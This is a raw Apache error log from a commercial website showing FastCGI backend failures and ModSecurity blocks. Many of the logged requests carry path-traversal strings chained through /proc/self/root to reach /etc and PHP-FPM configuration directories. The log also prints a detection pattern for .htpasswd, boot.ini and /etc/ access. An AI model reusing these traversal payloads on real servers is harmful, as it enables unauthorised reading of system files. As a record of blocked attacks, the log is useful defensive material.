[Wed Mar 18 03:36:33.258017 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] [client 179.188.53.243:43610] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.258050 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (104)Connection reset by peer: [client 179.188.53.243:43610] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.271614 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] [client 179.188.53.243:43870] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.271664 2026] [proxy_fcgi:error] [pid 15051:tid 140411590858496] (104)Connection reset by peer: [client 179.188.53.243:43870] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.273276 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] [client 179.188.53.243:39190] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.273302 2026] [proxy_fcgi:error] [pid 31803:tid 140411741927168] (104)Connection reset by peer: [client 179.188.53.243:39190] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.280219 2026] [proxy_fcgi:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:37126] AH01067: Failed to read FastCGI header, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:36:33.280263 2026] [proxy_fcgi:error] [pid 29882:tid 140411649607424] (104)Connection reset by peer: [client 74.7.243.128:37126] AH01075: Error dispatching request to : , referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:36:33.281985 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] [client 179.188.53.243:41228] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.282016 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (104)Connection reset by peer: [client 179.188.53.243:41228] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.282202 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] [client 179.188.53.243:44112] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.282219 2026] [proxy_fcgi:error] [pid 17887:tid 140411582465792] (104)Connection reset by peer: [client 179.188.53.243:44112] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.282761 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] [client 179.188.53.243:45096] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.282783 2026] [proxy_fcgi:error] [pid 19507:tid 140411649607424] (104)Connection reset by peer: [client 179.188.53.243:45096] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.283146 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] [client 179.188.53.243:42850] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.283167 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (104)Connection reset by peer: [client 179.188.53.243:42850] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.283314 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] [client 179.188.53.243:44736] AH01067: Failed to read FastCGI header
[Wed Mar 18 03:36:33.283338 2026] [proxy_fcgi:error] [pid 19507:tid 140411699963648] (104)Connection reset by peer: [client 179.188.53.243:44736] AH01075: Error dispatching request to : 
[Wed Mar 18 03:36:33.299677 2026] [proxy:error] [pid 15826:tid 140411741927168] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Wed Mar 18 03:36:33.299719 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] [client 74.7.241.31:46702] AH01079: failed to make connection to backend: httpd-UDS, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/systemd/user
[Wed Mar 18 03:36:33.717890 2026] [proxy:error] [pid 17653:tid 140411733534464] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Wed Mar 18 03:36:33.717949 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] [client 216.73.216.191:24960] AH01079: failed to make connection to backend: httpd-UDS
[Wed Mar 18 03:36:33.864141 2026] [proxy:error] [pid 31803:tid 140411725141760] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Wed Mar 18 03:36:33.864170 2026] [proxy_fcgi:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:59440] AH01079: failed to make connection to backend: httpd-UDS, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/usr/libexec
[Wed Mar 18 03:36:34.149523 2026] [proxy:error] [pid 17653:tid 140411674785536] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Wed Mar 18 03:36:34.149569 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] [client 74.7.241.31:44948] AH01079: failed to make connection to backend: httpd-UDS, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/systemd/user
[Wed Mar 18 03:36:34.311720 2026] [proxy:error] [pid 15826:tid 140411683178240] (2)No such file or directory: AH02454: FCGI: attempt to connect to Unix domain socket /var/lib/php-fpm/bandeirantesbomb3-8.0.sock (127.0.0.1:9000) failed
[Wed Mar 18 03:36:34.311763 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:59446] AH01079: failed to make connection to backend: httpd-UDS, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/udev/hwdb.d
[Wed Mar 18 03:36:46.009706 2026] [:error] [pid 15051:tid 140411691570944] [client 74.7.244.43:60810] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpH_imAPhZkrhU8w4kr3QAAAIY"]
[Wed Mar 18 03:36:59.104442 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.228.61:34716] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpIC-yqAr6etmhZHNp16AAAAE8"]
[Wed Mar 18 03:37:46.779703 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:59454] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIOsdf6f5d65gmYZSOQAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:37:49.256243 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:33140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIPfu8EFLIOrSqIpvErwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:37:53.943255 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.243.128:58652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIQSmAPhZkrhU8w4kr8QAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:38:01.803273 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:58664] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpISNa6ubjKNq_cu4ZTgQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:03.149245 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:33558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIS9Y0UrI5A3LftIxO9QAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:38:05.546041 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:33568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpITdY0UrI5A3LftIxO9wAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:06.871913 2026] [:error] [pid 30077:tid 140411666392832] [client 74.7.243.128:33578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpITvu8EFLIOrSqIpvEtgAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:08.178244 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.243.128:33582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIUAkwaGbbGflqUZDRKwAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:09.487147 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:59590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIUda6ubjKNq_cu4ZTgwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:38:13.127405 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:59594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIVUzinOy1jxa1j4fP_QAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:38:16.743580 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:59600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIWNa6ubjKNq_cu4ZTiwAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:18.119647 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:59612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIWgkwaGbbGflqUZDRMAAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:22.667151 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:34846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIXuw_le52K8_3pV2eVAAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:27.257950 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:34850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIY9a6ubjKNq_cu4ZTkwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:38:31.028871 2026] [:error] [pid 31803:tid 140411716749056] [client 74.7.243.128:34852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIZ-yqAr6etmhZHNp2UQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:38:34.721117 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.243.128:33222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpIauoXxyEfFpUF8f8rGAAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
